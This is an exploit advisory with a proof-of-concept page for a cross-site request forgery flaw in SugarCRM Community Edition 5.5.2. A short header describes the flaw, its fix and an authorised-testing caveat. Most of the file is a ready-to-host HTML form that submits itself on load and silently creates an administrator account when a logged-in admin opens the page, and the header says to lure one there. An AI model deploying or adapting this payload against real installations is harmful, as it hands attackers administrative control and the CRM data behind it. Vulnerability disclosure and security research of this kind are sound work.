<!--=========================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Cross-site Request Forgery                                                        #
# Software.................SugarCRM Community Edition 5.5.2                                                  #
# Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html                             #
# Date.....................2010-05-30                                                                        #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create  #
# a new administrator account. The Users module's Save action (index.php?module=Users&action=Save) accepts   #
# the POST below without any per-session anti-CSRF token, so any web page can submit it on behalf of a       #
# victim. The attack requires the victim to be logged in to SugarCRM with rights to create users (an         #
# administrator) and to open the attacker's page while that session is active; the browser attaches the      #
# session cookie automatically. Fix: require a server-validated, per-session token on every state-changing   #
# request (and verify the Origin/Referer header as defence in depth).                                        #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
# Host the page below and lure a logged-in administrator to it. Before use, replace the lab target           #
# 192.168.1.4 in the form action and the credentials (new_admin / Password1) with your own values.           #
# Test only against systems you are authorised to assess.                                                    #
#                                                                                                          -->
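<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>SugarCRM CE 5.5.2 CSRF PoC - create administrator</title>
</head>
<body>
  <!--
    Auto-submitting CSRF form. It POSTs a Users/Save request to the target
    SugarCRM instance. The victim's browser adds the SugarCRM session cookie
    to that request, so the server processes it with the victim's privileges.
    Nothing in the payload is bound to the victim's session (there is no
    anti-CSRF token field), which is the defect being demonstrated.

    Before use:
      * change the lab target (192.168.1.4) in the form "action" to the
        SugarCRM instance under test;
      * change sugar_user_name, new_password and confirm_new_password
        (the two password fields must match);
      * the field list mirrors what the Users EditView form posts; trimming
        it to the essential fields has not been tested here, so keep it intact.
  -->
  <form id="csrf" method="post" action="http://192.168.1.4/sugarcrm/index.php">
    <!-- Tab configuration carried over from the EditView form (URL-encoded in the value). -->
    <input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;">
    <input type="hidden" name="hide_tabs_def" value="">
    <input type="hidden" name="remove_tabs_def" value="">

    <!-- Routing: Users module, Save action, empty record id = create a new user. -->
    <input type="hidden" name="module" value="Users">
    <input type="hidden" name="record" value="">
    <input type="hidden" name="action" value="Save">
    <input type="hidden" name="page" value="EditView">
    <input type="hidden" name="return_module" value="Users">
    <input type="hidden" name="return_id" value="">
    <input type="hidden" name="return_action" value="DetailView">

    <!-- Account definition. is_admin / UserType are the fields that request administrator status. -->
    <input type="hidden" name="password_change" value="true">
    <input type="hidden" name="required_password" value="1">
    <input type="hidden" name="user_name" value="">
    <input type="hidden" name="type" value="">
    <input type="hidden" name="is_group" value="0">
    <input type="hidden" name="portal_only" value="">
    <input type="hidden" name="is_admin" value="1">
    <input type="hidden" name="is_current_admin" value="1">
    <input type="hidden" name="required_email_address" value="0">
    <input type="hidden" name="sugar_user_name" value="new_admin">
    <input type="hidden" name="unique_name" value="">
    <input type="hidden" name="first_name" value="">
    <input type="hidden" name="status" value="Active">
    <input type="hidden" name="last_name" value="a">
    <input type="hidden" name="UserType" value="Administrator">
    <!-- Credentials of the account being created; placeholder values, change before use. -->
    <input type="hidden" name="old_password" value="">
    <input type="hidden" name="new_password" value="Password1">
    <input type="hidden" name="confirm_new_password" value="Password1">

    <!-- Email widget fields, left empty. -->
    <input type="hidden" name="emailAddressWidget" value="1">
    <input type="hidden" name="emailAddress0" value="">
    <input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0">
    <input type="hidden" name="emailAddressVerifiedFlag0" value="true">
    <input type="hidden" name="emailAddressVerifiedValue0" value="">
    <input type="hidden" name="useEmailWidget" value="true">
    <input type="hidden" name="email_link_type" value="sugar">
    <input type="hidden" name="mail_smtpuser" value="">
    <input type="hidden" name="mail_smtppass" value="">

    <!-- Employee / profile details, left empty. -->
    <input type="hidden" name="employee_status" value="Active">
    <input type="hidden" name="title" value="">
    <input type="hidden" name="phone_work" value="">
    <input type="hidden" name="department" value="">
    <input type="hidden" name="phone_mobile" value="">
    <input type="hidden" name="reports_to_name" value="">
    <input type="hidden" name="reports_to_id" value="">
    <input type="hidden" name="phone_other" value="">
    <input type="hidden" name="phone_fax" value="">
    <input type="hidden" name="phone_home" value="">
    <input type="hidden" name="messenger_type" value="">
    <input type="hidden" name="messenger_id" value="">
    <input type="hidden" name="address_street" value="">
    <input type="hidden" name="address_city" value="">
    <input type="hidden" name="address_state" value="">
    <input type="hidden" name="address_postalcode" value="">
    <input type="hidden" name="address_country" value="">
    <input type="hidden" name="description" value="">

    <!-- User preferences, as posted by the default EditView form. -->
    <input type="hidden" name="receive_notifications" value="12">
    <input type="hidden" name="export_delimiter" value=",">
    <input type="hidden" name="mailmerge_on" value="0">
    <input type="hidden" name="reminder_time" value="60">
    <input type="hidden" name="default_export_charset" value="ISO-8859-1">
    <input type="hidden" name="user_max_tabs" value="12">
    <input type="hidden" name="user_max_subtabs" value="12">
    <input type="hidden" name="user_subpanel_tabs" value="on">
    <input type="hidden" name="dateformat" value="m/d/Y">
    <input type="hidden" name="currency" value="-99">
    <input type="hidden" name="timeformat" value="H:i">
    <input type="hidden" name="default_currency_significant_digits" value="2">
    <input type="hidden" name="timezone" value="Africa/Abidjan">
    <input type="hidden" name="ut" value="0">
    <input type="hidden" name="num_grp_sep" value=",">
    <input type="hidden" name="default_locale_name_format" value="s f l">
    <input type="hidden" name="dec_sep" value=".">
    <input type="hidden" name="calendar_publish_key" value="">
    <input type="hidden" name="outboundtest_from_address" value="">

    <!-- Visible fallback when JavaScript is disabled. The button is deliberately
         unnamed: a control named "submit" would shadow form.submit() and break
         the automatic submission below. -->
    <button type="submit">Continue</button>
  </form>
  <script>
    // Submit as soon as the form has been parsed; no user interaction needed.
    document.getElementById("csrf").submit();
  </script>
</body>
</html>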